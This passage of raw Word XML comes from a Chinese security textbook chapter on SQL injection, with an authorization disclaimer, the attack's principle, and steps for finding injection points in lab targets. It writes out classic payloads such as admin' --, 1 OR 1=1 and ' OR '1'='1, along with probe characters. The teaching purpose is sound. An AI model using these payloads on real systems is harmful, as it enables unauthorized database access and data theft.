        <w:t xml:space="preserve">请求参数嵌入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询的场景，Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“拦截-改包-重放”能力是手工注入定位的核心手段，本节将交叉回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实操。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[/前置依赖框]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[授权与隔离声明框]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令与操作仅限在读者自建的隔离实验网络、官方授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Broken Web Applications、DVWA、SQLi-labs、HackTheBox/TryHackMe/VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中明确授权目标）或已获得书面授权的系统上执行。实验网络必须与生产网络及互联网物理或逻辑隔离，实验结束后恢复快照。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">未经授权访问他人计算机系统违反《刑法》第二百八十五条等法律法规</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。本节命令中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_PORT&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;DATABASE_NAME&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等均为占位符，实际值因靶机环境而异。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[/授权与隔离声明框]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机（攻击者与防御者视角）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从攻击者视角看，Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用的数据库存储着核心敏感信息——用户凭据、会话令牌、业务数据。当应用在处理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求时将用户输入不加区分地拼接到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句中，攻击者就可以通过构造特殊的输入“逃逸”出数据上下文，进入代码上下文，从而读取、篡改或删除数据库内容。SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入（SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection，简称</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi）长期位列</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">高风险类别，近年来对应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A03:2021（Injection）类别，其本质是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数据与代码边界被混淆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一注入类漏洞的典型实例。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从防御者视角看，SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入是所有注入漏洞中“最应该被根治”的一类——安全社区在二十年的对抗中已经给出了理论完备、工程上成熟可部署的解决方案（参数化查询与预编译语句）。然而，存量系统中遗留的动态拼接代码、ORM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架的不当使用、以及缺乏安全编码规范的开发流程，使</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入至今仍是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用的头号大敌。蓝队不仅需要阻止注入，更需要通过数据库审计日志检测异常的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询和报错回显，在攻击链的早期发出告警。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉：引号与关键字的“越狱”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">想象一个简单的登录查询：应用在后端拼接出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE username='</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> +</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND password='</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">口令输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> +</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。正常用户输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句变成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE username='alice' AND password='secret'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——数据被单引号包裹在字符串字面量内，一切安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">但攻击者输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为用户名，SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句变为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE username='admin' -- ' AND password='...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。第一个单引号提前闭合了字符串，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将后面的内容全部注释掉。于是验证口令的条件被移除，查询等价于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE username='admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。输入中的引号和注释符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">打破了字符串字面量的边界</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，使攻击者提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键字</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被数据库引擎当作代码执行——这就是注入的第一性原理：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">当用户输入从“数据”提升为“代码”时，注入发生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">同样的直觉推广到数值型参数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM products WHERE id=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户输入。攻击者输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1 OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，语句变为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM products WHERE id=1 OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是恒真条件，返回全表数据。这个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式（及其数值版</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）本质上是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">用恒真条件消解掉原查询的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">约束</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，迫使数据库返回原本无权访问的行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">注入点定位：从测到辨</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在授权渗透测试中，定位</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入点有一套“试错—观察—确认”的方法论（见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Testing Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试模块）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">参数枚举</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求（交叉回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实操），识别所有可能进入数据库查询的参数——GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询字符串、POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表单字段、Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值、HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent、Referer）等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">语法试探</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：向每个参数依次注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（单引号）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（双引号）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（反斜杠）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等封闭字符序列。若服务器返回数据库错误（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">You have an error in your SQL syntax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、SQL Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Incorrect syntax near</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORA-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等），则该参数几乎肯定存在注入。若服务器返回统一错误页（手工配置或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">干扰），则需通过页面差异做进一步判断（详见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节盲注）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1089"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">闭合推断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：根据错误信息或页面行为，推断原</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句的闭合方式——单引号字符串？双引号？圆括号嵌套？攻击者需要“补全”被破坏的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语法，使注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">能够合法嵌入。典型的闭合策略包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
      <w:r>
